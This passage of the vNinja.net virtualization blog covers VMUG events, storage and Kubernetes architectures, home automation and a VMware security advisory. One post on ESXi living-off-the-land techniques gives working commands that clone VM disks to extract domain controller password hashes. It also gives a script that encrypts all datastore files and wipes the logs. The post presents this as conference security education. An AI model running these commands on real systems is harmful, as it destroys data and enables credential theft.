Europe in 2026 as well! Lastly thanks to all my fellow VMUG leaders and vExperts who I met this week; You made this event! Thanks for the smiles, laughter, discussions, food, and (Peruvian) beer! --- # Will We See YOU at VMUG Connect 2026 in Amsterdam? URL: https://vNinja.net/2025/12/21/vmug-connect-2026-amsterdam-session/ Date: 2025-12-21 Author: christian Tags: VMUG, VMUG Connect, VMware Yes, that right there is a we in the title! We’re thrilled to announce that mine and Stine’s joint session, Hypervisor Horror: Root Access and Regulatory Rage, has been selected for the first european VMUG Connect in Amsterdam 17th - 19th March 2026! Thank you to VMUG for the opportunity — we’re incredibly excited to engage with the VMUG community, connect with fellow practitioners, and be part of an outstanding speaker lineup at this year’s event. VMUG Connect is expanding in 2026 into a multi-day powerhouse event designed for deeper technical dives, richer discussions, hands-on labs, curated learning tracks, inspiring keynotes, and meaningful in-person connections with VMware professionals from around the world. Registration for VMUG Connect is open now! Session Abstract # Hypervisor Horror: Root Access and Regulatory Rage vSphere and VMware Cloud Foundation (VCF) environments are critical to enterprise infrastructure — but what happens when someone gains root access? Attackers are increasingly leveraging Living off the Land (LotL) techniques, using native ESXi commands and services to stealthily manipulate VMs, snapshots, and configurations, all while evading traditional detection. These subtle techniques can have devastating effects if hosts are not properly hardened. In this session, we’ll dive deep into real-world LotL ESXi techniques and demonstrate how attackers exploit hypervisors to gain persistent access. Attendees will learn practical strategies for defending VCF environments by applying industry best practices and hardening standards, including NIST guidelines, CIS Benchmarks, and MITRE ATT&CK frameworks. We will cover host hardening, monitoring and logging, configuration enforcement, and automated detection methods, giving administrators and security engineers the tools to prevent hypervisor compromise and protect the entire virtual infrastructure. Tentative session details # Track: Thrive in Tech Time Slot: March 18, 10:45 AM – 11:30 AM Format: Breakout See You at VMUG Connect Amsterdam! We’re looking forward to meeting you in Amsterdam and connecting with the broader VMUG community. Whether you’re attending for deep technical sessions, hands-on learning, or the opportunity to network with peers and industry experts, VMUG Connect is a fantastic place to learn, exchange ideas, and grow together. If you’re attending the event, we’d love to see you in our session and chat with you throughout the conference! --- # VMUG Connect is expanding in 2026 with five stops! URL: https://vNinja.net/2025/11/24/vmug-connect-2026/ Date: 2025-11-24 Author: christian Tags: VMUG, VMUG Connect, VMware After a successful launch in St. Louis this year, VMUG is bringing the experience to more communities. Next year, VMUG Connect will give members across these cities a chance to connect, learn, and collaborate in person. 2026 VMUG Connect cities, dates, and venues # Amsterdam 17–19 March – RAI Amsterdam Minneapolis 7–9 April – Hilton Minneapolis Toronto 12–14 May – Hilton Toronto/Markham Suites Dallas 9–11 June – Hyatt Regency Dallas Orlando 20–22 October – Caribe Royale Orlando VMUG Connect delivers days packed with real conversations, technical sessions, and time to engage with VMware users, partners, and experts. Each stop reflects its local community and the topics that matter most. Call for Papers! Have a session idea, best practice, or unique story to share? VMUG Connect wants to hear from you. Submit your proposal by December 20 to present across one of the events. What to expect # Four dynamic content tracks: Build Better. Optimize Smarter; Real Stories. Real Impact; Grow. Adapt. Lead; Lab It. Learn It. Live It. Hands-on labs, on-site certification exams, product demos, and panel discussions Career-focused sessions, Q&A with experts, and networking opportunities Social events, swag, giveaways, and VIP perks for VMUG Advantage members As the program grows, VMUG will continue adapting VMUG Connect to what members, partners, and the wider industry need, keeping it relevant, practical, and community-driven for years to come. It looks like both Stine and I will be at the Amsterdam event in March, and we might even take the stage for a session. --- # vSphere: It's All Fun and Games Until Someone Gets Root URL: https://vNinja.net/2025/09/18/vsphere-its-all-fun-and-games-until-someone-gets-root/ Date: 2025-09-18 Author: christian Tags: VMware, vSphere, ESXi, Security UK VMUG UserCon 2025. Photo by Chris Bradshaw At the VMUG UserCon UK 2025 I presented a session called “vSphere: It’s All Fun and Games Until Someone Gets Root”. The premise of the talk was the havoc a malicious actor can wreck in an environment, if they gain root access to an ESXi host. (YouTube recording, sadly audio only until the 21 minute mark) Of course, once someone has gained root access, all bets are off anyway, but there are some interesting tecniques that can be utilized simply by using native commands. This is otherwise known as Living off The Land (LOTL), where attackers use legitimate tools and features that are already present on a system, without the need for any external binaries or scripts. LOLbins for ESXi # LOLBins, or Living Off the Land Binaries, for ESXi hosts are interesting. These tools require no external dependencies, or code, to run which means that the ESXi Advanced setting VMkernel.Boot.execInstalledOnly will not prevent them from running at all. Besides, if someone has root access to an ESXi host, they can just turn the setting off anyway. Rogue / Ghost VMs # Shown at Explore 2025 in Barcelona, and published in Beware Of The Rogue VMs! This procedure still works in ESXi 8 and ESX 9, however if the environment is running Distributed Switches and/or NSX it is not easy to give a Rogue VM network access, since the nature of those setups require the VMs to be registered properly in the vCenter. Rogue VMs might still be useful in such an environment, as the method of exfiltrating data from VMs still work without network access for the VM itself — as long as you can reach the console of it somehow. Exfiltrating data from VMs # This section builds on the Rogue VM section, but the technique can be utilized on any VM, registered or not. Creating and cloning a snapshot # 1 2 3 vim-cmd vmsvc/getallvms | grep win-vm01 vim-cmd vmsvc/snapshot.create 44 my_evil_snapshot 0 0 vmkfstools -i win-vm01_2.vmdk clone.vmdk By utilizing the vim-cmd vmsvc/snapshot.create command, an attacker can create a snapshot of a running VM. Identify the VM to snapshot (Line 1), and create the snapshot (Line 2). vmkfstools can then be used to clone the snapshot into an independent .vmdk file (line 3). This is barely visible in the vCenter Client (if at all), so it shouldn’t raise any eyebrows. Add the cloned disk to a VM # In this case there is a running Rogue VM that I want to attach the newly cloned .vmdk file to, so I need to stop it from running to be able to add the disk to it. Normally this could be done with vim-cmd vmsvc/device.diskaddexisting but since the Rogue VM by nature is unregistered on the ESXi host, attaching the .vmdk file has to be done in a different manner. Stop the Rogue VM # By using esxcli vm process list I can identify the world-id associated with my VM and kill it with esxcli vm process kill -t force --world-id <id>. 1 2 esxcli vm process list esxcli vm process kill -t force --world-id <id> Edit the VM .vmx file # Once the Rogue VM is no longer running, the .vmx file can be edited and the clone.vmdk file attached. scsi0:1.deviceType = "scsi-hardDisk" scsi0:1.fileName = "/vmfs/volumes/68b81584-ef417095-8ff0-00505691514a/win-vm01/clone.vmdk" sched.scsi0:1.shares = "normal" sched.scsi0:1.throughputCap = "off" scsi0:1.present = "TRUE" After adding the disk the Rogue VM can be restarted, and the .vmdk is available to it. Mounting the drive gives full access to all files, without turning off the original VM. This way NTDS.DIT and SYSTEM Registry Hives can be extracted from a Windows Server Domain Controller for offline password cracking with tools like Hashcat, as well as saved browser credentials or other files of interest, mostly without visible traces in the vSphere Client. The snapshot created earlier will be visible, so removing it after the clone operation would be a good idea. Something similar has been seen in the wild by Scattered Spider but their approach has been more of a brute force one. Their tactic has been to power off VMs and then attach the powered off VMs .vmdk file to a VM under their control. My example here utilizes cloned snapshots instead, something that is less likely to cause alerts in the environment as there is no need to turn off VMs to access its disks. If the VM used for extraction purposes does not have network access, adding a second small .vmdk file to it where extracted files are place would make it trivial to copy that .vmdk from the Datastore it is located on out from the host via SSH instead of exfiltrating large .vmdk files. Encrypting VMs # It is fairly simple to encrypt all files on a filesystem that ESXi can write to, without any external binaries or code. 1 2 3 4 5 6 7 8 9 10 11 12 for vmid in $(vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'); do vim-cmd vmsvc/power.off "$vmid" done && find . -type f ! -name '*.ohshit' -print0 | xargs -0 -P 10 -n 1 -I{} sh -c ' openssl enc -aes-256-cbc -md sha256 -pbkdf2 -salt \ -pass pass:"$MYPASS" \ -in "$1" -out "$1.ohshit" && rm "$1" ' _ "{}" && >/.ash_history && >/var/log/shell.log Explanation # Line 1-2 The for loop iterates through the following commands: vim-cmd vmsvc/getallvms → lists all registered VMs on a VMware ESXi host. awk 'NR>1 {print $1}' → skips the header line and extracts just the first column (the VM IDs). It then powers off, with vim-cmd vmsvc/power.off, for each VM ID to ensure the VM is not running, and it’s files are accessible by the next commands. Line 4-9 Proceeds to use openssl to encrypt and salt all files it finds, with the password stored in the $MYPASS environment variable. find . -type f → recursively find all files. ! -name '*.ohshit' → skip already-encrypted files. -print0 + xargs -0 → safe for spaces/newlines in filenames. -P 10 → run up to 10 encryptions in parallel. For each file: openssl enc -aes-256-cbc -md sha256 -salt -pbkdf2 -pass pass:"$MYPASS" → encrypt and salt with AES-256 using $MYPASS as the password. -out "$1.ohshit" → writes encrypted file with .ohshit extension. && rm "$1" → deletes the original file once encryption succeeds. All files gets encrypted and replaced with an .ohshitfile. Line 11 >/.ash_history→ truncates the BusyBox ash shell history >/var/log/shell.log → truncates the shell log file. This simply empties out the Busybox history, and the ESXi hosts shell.log to ensure that the password used for encryption isn’t easily retrieved. In summary, this shell script powers off all registered VMs on a host, runs through the datastore it’s run on and encrypts all files it can touch and cleans up logfiles once it’s done. All with native tools provided by any ESXi host by default. Now this is not the fastest, or most efficient, way to encrypt large files but it shows that it is possible by just utilizing built-in commands and tools. Even if the encryption here takes a while to complete for the larger .vmdk files, the smaller .vmx files encrypt very quickly, making it hard to power on VMs again once this has started churning through the files. Summary # Utilizing native tools already present on an ESXi system in malicious ways is fairly simple. The tools used here have real legitimate administrative purposes, but they can also be used for “alternative” purposes. There are many examples of Living off The Land techniques being utilized in the wild by malicious actors. Going forward my hope is that ESXi goes the route of Talos and implements an autenticated API-only approach. There really shouldn’t be a need for logging into an ESXi host with root privileges at all. --- # GL-iNet Opal (GL-SFT1200) Travel Router: Real Usage Experience URL: https://vNinja.net/2025/09/15/gl-inet-opal-travel-router-experience/ Date: 2025-09-15 Author: christian Tags: GL-iNet, Networking, DNS, WireGuard, Opal In August 2024, I acquired a GL.iNet Opal (GL-SFT1200) Travel Router, and it has since become an indispensable companion for my multi-day travels. Its compact design and robust feature set have consistently met my connectivity needs on the road. Real-World Use # Over the past year, the Opal has been tested in various accommodations, including hotels and guesthouses, without any connectivity issues. Its versatility is evident as it seamlessly handles both wired uplinks and wireless repeater modes, even in environments with captive portals. A notable feature is the ability to configure a dedicated “travel WiFi” SSID. This setup ensures that all my devices connect automatically without the need for repeated authentication at each new location. This convenience is particularly beneficial during extended stays, where maintaining a consistent network environment is crucial. Additionally, I often travel with an Apple TV. Configuring the Opal to support this device has enabled smooth streaming experiences, allowing for uninterrupted media consumption during downtime. The Opal also handles multiple devices simultaneously with surprising stability. Its small form factor makes it easy to pack, but it delivers more capability than its size suggests. Security and Privacy # The Opal’s security features enhance its appeal. It supports WireGuard VPN out of the box, facilitating secure tunneling back to my home network. VPN throughput peaks at roughly 65 Mbps, which is more than sufficient for typical hotel internet speeds and ensures secure browsing across multiple devices. I’ve also configured DNS-over-TLS to forward all DNS queries back to my Pi-hole at home. This not only encrypts DNS traffic but also provides ad-free browsing on the road, effectively replicating the experience of my home network. Performance Considerations # While the Opal offers commendable performance, it’s important to understand its limitations. The device supports: Wired LAN/WAN: Up to 300 Mbps WiFi (2.4 GHz): Up to 300 Mbps WiFi (5 GHz): Up to 867 Mbps These numbers are sufficient for most travel scenarios, including streaming and general browsing. However, for tasks requiring higher bandwidth—large file transfers, high-definition video conferencing—the Opal’s throughput may become a limiting factor. For more demanding use cases, GL.iNet offers more powerful travel routers such as the Beryl AX (GL-MT3000) and Slate AX (GL-AXT1800). Both feature WiFi 6 and higher VPN throughput, making them better suited for users who need speed as well as flexibility. Verdict # The GL.iNet Opal (GL-SFT1200) Travel Router strikes a balance between portability, functionality, and security. Its ability to provide a stable and secure network connection in a variety of travel scenarios makes it a valuable tool for frequent travelers. While it may not offer the fastest speeds, its features and reliability make it a consistently useful companion. Between persistent travel SSIDs, WireGuard VPN, and DNS-over-TLS to my Pi-hole, the Opal transforms what would otherwise be a tedious travel WiFi experience into something seamless, secure, and ad-free. In short, it has delivered exactly what it promises without hassle. --- # vSphere LCM Moving From Baselines to Images URL: https://vNinja.net/2025/09/12/vsphere-moving-from-baselines-to-images/ Date: 2025-09-12 Author: stine Tags: VMware, vSphere, ESXi If you are using baselines to update your VMware clusters and see this message on your cluster then it’s about time to move from baseline updating to vSphere Lifecycle Manager images (vLCM). Here’s a quick guide to how this can be done # Navigate to your cluster – Updates and pick “manage with a single image”: Pick “setup image manually”: When the “convert to an image” menu appears you are presented with choices on what ESXi version you want your cluster to use, vendor addon, firmware and drivers addon and components: Pick the right configuration you want for your cluster and check that all your choices are compatible by checking with the “validate” button. When you are satisfied with your configuration and everything is valid press “finish setup”: You are now using vLCM images to update your cluster! --- # Storage in Hypervisor and Kubernetes Environments: What Are the Options? URL: https://vNinja.net/2025/09/12/storage-in-hypervisor-and-kubernetes-environments/ Date: 2025-09-12 Author: christian Tags: Kubernetes, k8s, Containers, Virtualization, Hypervisor, KubeVirt, Storage When talking about modern infrastructure, storage is as critical as compute and networking. Applications — whether traditional VMs or cloud-native containers — depend on reliable, performant, and consistent storage. I’ll focus on three common approaches to storage in mixed Kubernetes + hypervisor environments: Hypervisor-based storage (VM-centric, provided by the virtualization platform). Kubernetes-managed storage (container-centric, via CSI plugins). Integrated/hybrid storage models (shared storage pools accessible to both VMs and containers). Note: These are general architectural patterns, not tied to any single hypervisor or storage vendor. Real-world implementations may vary. 1. Hypervisor-Based Storage # In this model, storage is managed at the hypervisor layer. VMs consume storage as virtual disks. Kubernetes nodes (running in VMs) see these as block devices. Persistent storage for pods depends on attaching volumes through the VM layer. Diagram: flowchart TB classDef storage fill:#FFD580,stroke:#333,stroke-width:1px; classDef vm fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; A["Physical Server"] --> B["Hypervisor"] B --> C["VM: K8s Node"] C --> P1["Pod: App"] B --> S["Hypervisor Storage"] S -.-> C C -.-> P1 class S storage; class C vm; class P1 pod; Figure 1: Hypervisor provides primary storage. Pods consume volumes indirectly via VM disks. Pros: Mature, enterprise-grade features (snapshots, replication, HA). Existing investments in hypervisor storage can be reused. Cons: Indirect path for containers (pod → VM → hypervisor → storage). Limited Kubernetes-native flexibility. 2. Kubernetes-Managed Storage # Here, Kubernetes manages storage directly using the Container Storage Interface (CSI). Pods request storage via PersistentVolumeClaims (PVCs). Backed by CSI drivers for different storage systems. Kubernetes abstracts the underlying system, making it container-first. See the CSI overview for more details. Diagram: flowchart TB classDef storage fill:#FFD580,stroke:#333,stroke-width:1px; classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; X["K8s Node"] --> P["Pod: App"] X --> CSI["CSI Driver"] CSI --> DS["Storage System"] class X node; class P pod; class DS storage; Figure 2: Kubernetes manages storage directly using CSI plugins. Pods request PersistentVolumes via PVCs. Pros: Kubernetes-native workflows (PVCs, dynamic provisioning). Portable across environments. Scales with the cluster. Cons: Requires CSI integration. Features (e.g., snapshots, encryption) depend on the storage backend. 3. Integrated / Hybrid Storage Models # Some environments expose shared storage pools to both VMs and Kubernetes. Hypervisor workloads and container workloads use the same underlying storage system. Example: hypervisor storage made available to Kubernetes through a CSI driver. Diagram: flowchart TB classDef storage fill:#FFD580,stroke:#333,stroke-width:1px; classDef vm fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; A["Physical Server"] --> H["Hypervisor"] H --> VM["VM: App"] H --> K["K8s Node"] K --> P["Pod: App"] H --> S["Shared Storage Pool"] S -.-> VM S -.-> K K -.-> P class S storage; class VM,K vm; class P pod; Figure 3: Shared storage pool used by both VMs and Kubernetes pods. Pros: Unified storage strategy for VMs and containers. Simplifies operations. Easier data mobility across environments. Cons: More complex integration. May require specific vendor solutions. Storage Comparison Diagram # To summarize, here’s a visual comparison of how storage flows in each model: flowchart LR classDef storage fill:#FFD580,stroke:#333,stroke-width:1px; classDef vm fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; O1H["Hypervisor"] --> O1VM["VM: K8s Node"] O1VM --> O1P["Pod: App"] O1H --> O1S["Hypervisor Storage"] O1S -.-> O1VM O1VM -.-> O1P O2N["K8s Node"] --> O2P["Pod: App"] O2N --> O2C["CSI Driver"] O2C --> O2S["Storage System"] O3H["Hypervisor"] --> O3VM["VM: App"] O3H --> O3K["K8s Node"] O3K --> O3P["Pod: App"] O3H --> O3S["Shared Storage Pool"] O3S -.-> O3VM O3S -.-> O3K O3K -.-> O3P class O1S,O2S,O3S storage; class O1VM,O3VM,O2N,O3K vm; class O1P,O2P,O3P pod; Figure 4: Comparison of storage models across hypervisor-based, Kubernetes-managed, and hybrid environments. Performance Comparison # Option Latency Throughput Scalability 1. Hypervisor-based Higher (extra VM layer) Good for VM-centric workloads Scales with hypervisor cluster 2. Kubernetes-managed (CSI) Lower (direct to storage) Scales with Kubernetes cluster Highly scalable with CSI drivers 3. Integrated/Hybrid Medium (shared layer adds overhead) Balanced across VMs and pods Scales with both hypervisor + Kubernetes Choosing the Right Storage Model # Option Description Pros Cons 1. Hypervisor-based VMs own storage; pods consume via VM disks Mature features, reuse existing storage Indirect for pods, less flexible 2. Kubernetes-managed (CSI) Kubernetes directly provisions storage Native integration, portable Depends on CSI backend, may lack enterprise features 3. Integrated/Hybrid Shared pool for VMs and pods Unified strategy, easier mobility Complex integration, vendor lock-in Workload Considerations # VM-heavy workloads: Hypervisor-based or hybrid models may be more efficient. Container-first workloads: Kubernetes-managed CSI storage is often best. Mixed workloads: Hybrid approaches provide the most flexibility. Summary # Storage design in Kubernetes + hypervisor environments is about balancing maturity, flexibility, and integration: Hypervisor storage is stable and feature-rich but less Kubernetes-native. Kubernetes CSI offers portability and container-first workflows (CSI overview). Hybrid models unify the storage plane for both worlds but can add complexity. As with compute and networking, the right storage model depends on your workload priorities and operational requirements. --- # Containers in Your Hypervisor vs. VMs in Kubernetes: What’s the Difference? URL: https://vNinja.net/2025/09/11/containers-in-your-hypervisor-or-vms-in-kubernetes/ Date: 2025-09-11 Author: christian Tags: Kubernetes, k8s, Containers, Virtualization, Hypervisor, KubeVirt When talking about modern infrastructure, there are multiple ways to combine virtualization and Kubernetes. I’ll focus on three common approaches: Kubernetes running directly on the hypervisor alongside traditional VMs. Kubernetes running inside VMs on a hypervisor. VMs running inside Kubernetes (via KubeVirt). The architectures described below are general concepts and not specific to any single hypervisor. They illustrate common patterns for combining virtualization and Kubernetes, but exact implementations may vary depending on your infrastructure vendor and setup. Storage is covered in Part 2 — this overview focuses on compute and networking. Persistent storage integration is a separate design consideration. 1. Kubernetes Directly on the Hypervisor # In this model: The hypervisor runs traditional VMs for legacy workloads. A Kubernetes cluster runs directly on the hypervisor to manage containers as pods. Pods can represent cloud-native applications without requiring an extra VM layer. Diagram: flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; A["Physical Server"] --> B["Hypervisor"] B --> C["VM: Full OS"] B --> K["K8s Node(s)"] K --> P1["Cloud Native App A"] K --> P2["Cloud Native App B"] class C,K node; class P1,P2 pod; Figure 1: Hypervisor model. A traditional VM runs a full OS (light blue), and a Kubernetes cluster (light cyan node) runs directly on the hypervisor managing multiple cloud-native app pods (light green). Network isolation is possible depending on hypervisor and CNI configuration. This setup allows for common management of both traditional VMs and Kubernetes nodes. Key points: Kubernetes nodes run directly on the hypervisor, alongside other VMs. Provides common management with other hypervisor workloads — everything can be managed through the same hypervisor tools. Pods run directly on cluster nodes on the hypervisor. Isolation depends on hypervisor networking and CNI configuration; snapshots/migration can be more complex. 2. Kubernetes Inside VMs # Some organizations prefer to run Kubernetes inside VMs on a hypervisor: Hypervisor provides VMs with full OS isolation. Kubernetes runs inside one or more of these VMs. Pods run inside the Kubernetes cluster, which itself is inside VMs. Diagram: flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; A["Physical Server"] --> B["Hypervisor"] B --> VM1["VM 1: K8s Node"] B --> VM2["VM 2: K8s Node"] VM1 --> P1["Cloud Native App A"] VM2 --> P2["Cloud Native App B"] class VM1,VM2 node; class P1,P2 pod; Figure 2: Kubernetes cluster running inside VMs. Each VM (light blue) contains a Kubernetes node which manages pods (light green). Network isolation is strong due to VM boundaries. Key points: Adds an extra layer of isolation using VMs. Useful for multi-tenant environments or when compliance requires OS-level separation. Slightly more complex infrastructure compared to running Kubernetes directly on the hypervisor. 3. VMs Inside Kubernetes (KubeVirt) # Kubernetes becomes the control plane and manages VMs as workloads using KubeVirt: Kubernetes manages both pods (containers) and VMs. VMs can host traditional workloads or cloud-native applications. This unifies management under Kubernetes for hybrid workloads. Diagram: flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; X["Physical Server"] --> Y["Kubernetes Cluster"] Y --> P["Pod: Cloud Native App"] Y --> Q["Pod: VM (KubeVirt)"] Q --> Q1["Legacy App"] class Y,Q node; class P,Q1 pod; Figure 3: VMs managed as pods inside a Kubernetes cluster. Pod container is light green, VM node light blue, Cloud Native App highlighted in gold. Choosing the Right Model # Option Description Pros Cons 1. Kubernetes on Hypervisor Kubernetes cluster runs directly on the hypervisor, alongside traditional VMs Unified management with other hypervisor workloads, no extra VM layer More complex to manage, isolation depends on network configuration, harder to migrate or snapshot Kubernetes nodes 2. Kubernetes inside VMs Kubernetes cluster runs inside VMs on a hypervisor Strong OS-level isolation, multi-tenant friendly Extra layer, slightly more complex 3. VMs inside Kubernetes (KubeVirt) Kubernetes manages both pods and VMs Single control plane for all workloads, hybrid-ready Learning curve, adds Kubernetes dependency for VM workloads Workload Considerations # Traditional VMs primary workload: Option 1 or 2 might be better. Cloud-native container primary workload: Option 3 is likely more suitable. Consider management, isolation, and operational complexity. Networking Considerations # Option Networking Isolation Complexity 1. Kubernetes on Hypervisor Pods → hypervisor network; CNI (learn more) Depends on configuration Low-to-moderate 2. Kubernetes inside VMs Pods → VM network → hypervisor Strong Moderate-to-high 3. VMs inside Kubernetes Pods & VMs → Kubernetes overlay (KubeVirt) Moderate High Takeaway: Network setup should reflect isolation, security, and workload requirements. Network Comparison # flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef net fill:#90EE90,stroke:#333,stroke-width:1px; O1["Kubernetes in Hypervisor"] O2["Kubernetes in VMs"] O3["VMs in Kubernetes (KubeVirt)"] O1_N["Pods → Hypervisor network (CNI)"] O2_N["Pods → VM network → Hypervisor"] O3_N["Pods & VMs → Kubernetes overlay network"] O1 --> O1_N O2 --> O2_N O3 --> O3_N class O1,O2,O3 node; class O1_N,O2_N,O3_N net; Figure 4: Simplified networking comparison. Light blue = nodes/VMs, light green = pod/VM networking layers. Summary # There are multiple ways to deploy containers and VMs, each with different trade-offs: Kubernetes in Hypervisor: Simplest management alongside traditional VMs; network isolation depends on CNI. Kubernetes in VMs: Strong isolation via VM boundaries; slightly more complex setup. VMs in Kubernetes (KubeVirt): Unified control plane for containers and VMs; advanced networking setup. Before selecting a deployment model, carefully consider: Primary workload type: Traditional VMs vs. cloud-native containers. Isolation and security requirements: VM boundaries, network segmentation, CNI configuration. Operational complexity: Management tools, snapshots, migrations, and networking setup. No single approach fits every scenario — the right choice depends on workload, expertise, and infrastructure goals. --- # How to set up a VMware vSphere Native Key Provider (NKP) URL: https://vNinja.net/2025/08/15/how-to-set-up-a-vsphere-native-key-provider/ Date: 2025-08-15 Author: stine Tags: VMware, vSphere, ESXi From VMware vSphere 7.0.2 you can configure a vSphere Native Key Provider (NKP) to enable encryption-related functionality from your vCenter. The ESXi hosts do not require a TPM 2.0 chip to use NKP, but a TPM chip provides enhanced security. How to configure NKP in vCenter # From your vSphere client choose your vCenter – Configure – Key providers under Security: Press “Add” and choose “Add Native Key Provider” Give your NKP a name If you leave the “Use key provider only with TPM protected ESXi host (Recommended)”-box checked the NKP can only be used by hosts with a TPM 2.0. If you want hosts without TPM to be able to use the NKP just uncheck it. Your NKP will be configured and ready for use in about five minutes. --- # Casting Home Assistant Dashboards to Google Nest Hub 2nd Gen - Take 2 URL: https://vNinja.net/2025/07/20/homeassistant-google-nest-hub-2nd-gen-take2/ Date: 2025-07-20 Author: christian Tags: Home Assistant, Home Automation, Google Nest, Container Simplifying Home Assistant Dashboard Casting to Google Nest Hubs # Back in 2022, I shared how I used Cast All The Things (CATT) to display Home Assistant Lovelace dashboards on my Google Nest Hub 2nd gen. At the time, the setup was admittedly complex relying on Node-RED to SSH into a virtual machine and trigger bash scripts. That approach served me well for a few years, but I’ve since streamlined the process significantly. With the help of two excellent tools, ha-catt-fix and the ryanbarrett/catt-chromecast container I have eliminated the need for Node-RED and the custom scripts entirely. ha-catt-fix: Solving the Recast Problem # One of the main challenges with casting dashboards to Nest Hubs is the need to recast every 10 minutes, which I previously handled via Node-RED automations. Now, thanks to ha-catt-fix, that issue is resolved. Once installed and configured, it automatically takes care of keeping the cast alive with no extra logic required. Casting with ryanbarrett/catt-chromecast # Casting with the ryanbarrett/catt-chromecast container is straightforward. The only customization needed is the command that runs on container start up. I use the following: 'sh' '-c' 'catt -d [Google Nest IP] cast_site [Lovelace URL]' I run one container per Nest Hub, which allows me to target different dashboards for each device depending on its location or use case. The rest of my Home Assistant setup remains unchanged. If you need a refresher, check out the Preparing Home Assistant section from the original post. --- # Migrating From Sonoff ZBDongle-P to SMLIGHT SLZB-MRW10 in Zigbee2MQTT URL: https://vNinja.net/2025/07/16/migrating-from-zbdongle-p-to-slzb-mrw10-zigbee2mqtt/ Date: 2025-07-16 Author: christian Tags: Home Assistant, Home Automation, Zigbee, Zigbee2MQTT My home Zigbee network has been powered by a Sonoff ZBDongle-P coordinator since 2022, and it’s worked very well. The problem with it is that it’s USB based, and since I run Zigbee2MQTT as an addon to Home Assistant in a VM, that VM needs to be pinned to a specific host in the the cluster and I couldn’t move it around. Thankfully there’s been some great development around these kinds of devices in the last couple of years, and newer devices with direct network connectivity, powered via PoE, is now available. As an added bonus, these devices from SMLIGHT also have a built-in admin interface! I ended up ordering a SMLIGHT SLZB-MRW10, a two radio version that provides Zigbee via a Texas Instruments CC2674P10 chip and Z-Wave via a Silicon Labs EFR32ZG23 chip. The last part was surprising to me, as I had originally planned to do Thread via the non-Zigbee radio. Turns out I should have ordered a SMLIGHT SLZB-MR3 and not the MRW10 edition, but for now this solves my Zigbee issues at least. Hopefully the MRW10 unit will get Thread support via a firmware upgrade at a later stage, as it’s currently in what SMLIGHT calls an “Evaluation Phase” — Guess I’m an early adopter, even if unintentional. Migrating From Sonoff ZBDongle-P to SMLIGHT SLZB-MRW10 # Migrating from the old Sonoff ZBDongle-P to the SLZB-MRW10 was pretty simple, and this is the procedure I followed: Connect SLZB-MRW10 to my IoT VLAN network, powered via PoE Open a browser an connect via mDNS slzb-mrw10.local or IP address assigned via DHCP Set static IP (Not really required, but I like to have static IPs for things like this) in “Network” -> “Ethernet Options” Configure Radio 1 (EFR32ZG23) for Z-Wave and Radio 2 (CC2674P10) for Zigbee under “Mode” Update all firmware in “Settings and Tools” -> “Firmware update” Configure time settings in “Settings and Tools” -> “Time Settings” Copy the IEEE address of the old Sonoff ZBDongle-P stick. This can be found in Zigbee2MQTT at “Settings” -> “About” -> “Coordinator IEEE Address” The migration from Sonoff ZBDongle-P to the CC2674P10 chip on the SLZB-MRW10 doesn’t require re-pairing of Zigbee devices (both run zstack), so copying the IEEE address should be enough to get the existing devices to connect to the new coordinator once Zigbee2MQTT utilizes it. Stop the Zigbee2MQTT addon in Home Assistant Paste the old IEEE address into the SLZB-MRW10 admin interface under “Z2M and ZHA” -> “ADVANCED: Adapter IEEE address change” -> “[CC2674P10] Flash custom IEEE address” Find the “Zigbee2MQTT and ZHA Config generator” section in “Z2M and ZHA”. Select “Zigbee2MQTT” and copy the generated Zigbee2MQTT config (or do it manually). Log into HA, find the Zigbee2MQTT addon config, and paste the new config in. In general you will want to replace port: /dev/ttyUSB0 with port: tcp://ipaddress:port and ensure that baudrate: 115200 is set. Double check that the ip address is correct, and that the right port for the right radio is selected (Radio 1 and Radio 2 uses different ports) Start the Zigbee2MQTT addon If everything is configured correctly, Zigbee2MQTT should start up again connecting to the SLZB-MRW10 device instead of the old USB device. Wait until the Zigbee mesh network stabilizes, this might take some time while the network reconnects everything. Some battery based devices might need a nudge to reconnect, like pressing a button or triggering some other kind of event. In my case, my existing Zigbee network was up and running in a couple of minutes, and I’ve had zero issues with it since migrating over. I had one older IKEA E1812 shortcut button that I couldn’t reconnect to my network before changing coordinators. After the migration, it was adopted without issues. In general it looks like my Link Quality Indication (LQI) has improved pretty much for all devices, and it seems to respond quicker than before. Finally I can vMotion my HA VM without planning or moving USB connections, and it seems I got better Zigbee performance out of it as well. I like it! --- # VMware Critical Security Advisory: VMSA-2025-0013 URL: https://vNinja.net/2025/07/15/vmware-critical-security-advisory-vmsa-2025-0013/ Date: 2025-07-15 Author: christian Tags: VMware, vSphere, ESXi, Workstation, Fusion, VMware Tools Back in May at Pwn2Own Berlin 2025 a couple of new VMware ESXi, Workstation/Fusion and VMware Tools exploits were successfully exploited. Today Broadcom has released a new security advisory, VMSA-2025-0013, specifically targeting these exploits. The fixed exploits are as follows, with the corresponding CVSSv3 scores: VMXNET3 integer-overflow vulnerability (CVE-2025-41236) # Maximum CVSSv3 base score of 9.3. VMCI integer-underflow vulnerability (CVE-2025-41237) # Maximum CVSSv3 base score of 9.3. PVSCSI heap-overflow vulnerability (CVE-2025-41238) # Maximum CVSSv3 base score of 9.3. vSockets information-disclosure vulnerability (CVE-2025-41239) # CVSSv3 base score of 7.1 Comments # Based on the potentially high CVSSv3 scores here of 9.3, it’s important to get all systems patched as soon as possible before this gets exploited in the wild. Broadcom has also created it’s own FAQ page with more details: VMSA-2025-0013: Questions & Answers which covers a lot of good information. Especially this bulletpoint in the FAQ highlight the danger that this poses: Is this a “VM Escape?” Yes. This is a situation where an attacker who has already compromised a virtual machine’s guest OS and gained privileged access (administrator or root) could escape into the hypervisor itself. These issues are resolved 